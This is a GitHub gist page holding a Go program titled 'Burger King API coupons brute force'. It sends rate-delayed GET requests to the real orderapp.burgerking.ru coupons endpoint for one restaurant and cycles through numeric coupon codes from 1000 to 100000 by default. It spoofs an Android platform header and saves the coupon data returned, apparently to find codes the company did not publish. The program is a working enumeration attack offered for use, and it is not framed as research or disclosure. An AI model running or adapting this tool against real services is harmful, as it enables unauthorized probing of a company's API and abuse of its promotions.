Skip to content

Instantly share code, notes, and snippets.

@tie tie/bk.go Secret
Last active Aug 14, 2019

Embed
What would you like to do?
Burger King API coupons brute force
package main
import (
"os"
"io"
"log"
"flag"
"sync"
"time"
"bytes"
"strconv"
"net/url"
"net/http"
"encoding/json"
)
var (
outputFile = flag.String(
"output",
"",
"path to output file (defaults to stdout)",
)
delayTime = flag.Duration(
"delay",
300 * time.Millisecond,
"sleep time before spawning a new goroutine for request",
)
loCode = flag.Int(
"lo",
1000,
"lowest code number",
)
hiCode = flag.Int(
"hi",
100000,
"highest code number",
)
)
type Response struct {
Id int `json:"id"`
Rid int `json:"rid"`
Price int `json:"price"`
Name string `json:"name"`
Code string `json:"code"`
Hidden bool `json:"hidden"`
ShortName string `json:"short_name"`
AltName string `json:"alt_name"`
AltNameShort string `json:"alt_name_short"`
Instruction string `json:"instruction"`
Description string `json:"description"`
Comment string `json:"comment"`
Recommend interface{} `json:"recommend"` // type unknown
Details bool `json:"details"`
Properties []interface{} `json:"properties"` // element type unknown
Active int `json:"active"`
MaxCount int `json:"max_count"`
Type int `json:"type"`
DisableCode bool `json:"disable_code"`
Image string `json:"image"`
Image128 string `json:"image_128"`
Image256 string `json:"image_256"`
Image512 string `json:"image_512"`
ComboModiId interface{} `json:"combo_modi_id"` // type unknown
Combo struct {
Id int `json:"id"`
Type int `json:"type"`
Name string `json:"name"`
Image string `json:"image"`
Image128 string `json:"image_128"`
Image256 string `json:"image_256"`
Image512 string `json:"image_512"`
} `json:"combo"`
}
type Message struct {
Response `json:"response"`
Status string `json:"status"`
Techwork interface{} `json:"techwork"`
}
type CouponRequestParams struct {
Restaurant int
Code int
}
type CouponRequest *http.Request
func NewCouponRequest(params *CouponRequestParams) (CouponRequest, error) {
vals := url.Values{
"restaurant": { strconv.Itoa(params.Restaurant) },
"code": { strconv.Itoa(params.Code) },
}
url := &url.URL{
Scheme: "https",
Host: "orderapp.burgerking.ru",
Path: "/api/v1/menu/coupons",
RawQuery: vals.Encode(),
}
req, err := http.NewRequest(http.MethodGet, url.String(), nil)
if err != nil {
return nil, err
}
req.Header = http.Header{
"User-Agent": {"_"},
"user-agent": {"_"},
"x-burgerking-platform": {"android"},
}
return req, nil
}
type data struct {
params *CouponRequestParams
buf *bytes.Buffer
err error
}
func main() {
flag.Parse()
stdout := os.Stdout
if *outputFile != "" {
fd, err := os.Create(*outputFile)
if err != nil {
log.Fatalf("cannot create output file: %s", err)
}
stdout = fd
}
lo, hi := *loCode, *hiCode
if hi <= lo {
log.Fatal("lo must be less than hi")
}
bufs := make(chan data)
go func() {
delayer := time.NewTicker(*delayTime)
wg := &sync.WaitGroup{}
wg.Add(hi - lo)
for i := lo; i < hi; i += 1 {
go func(i int) {
defer wg.Done()
params := &CouponRequestParams{
Restaurant: 361,
Code: i,
}
buf, err := process(params)
if err != nil {
bufs <- data{params,nil,err}
return
}
bufs <- data{params,buf,nil}
}(i)
<-delayer.C
}
delayer.Stop()
wg.Wait()
close(bufs)
}()
messages := []interface{}{}
for d := range bufs {
if d.err != nil {
log.Printf("code %d: request error: %s", d.params.Code, d.err)
continue
}
var m interface{}
if err := json.NewDecoder(d.buf).Decode(&m); err != nil {
log.Printf("code %d: decoding error: %s", d.params.Code, err)
continue
}
messages = append(messages, m)
log.Printf("code %d: done", d.params.Code)
}
if err := json.NewEncoder(stdout).Encode(messages); err != nil {
log.Fatal(err)
}
}
func process(params *CouponRequestParams) (*bytes.Buffer, error) {
req, err := NewCouponRequest(params)
if err != nil {
return nil, err
}
resp, err := http.DefaultClient.Do(req)
if err != nil {
return nil, err
}
defer resp.Body.Close()
buf := &bytes.Buffer{}
if _, err := io.Copy(buf, resp.Body); err != nil {
return nil, err
}
return buf, nil
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.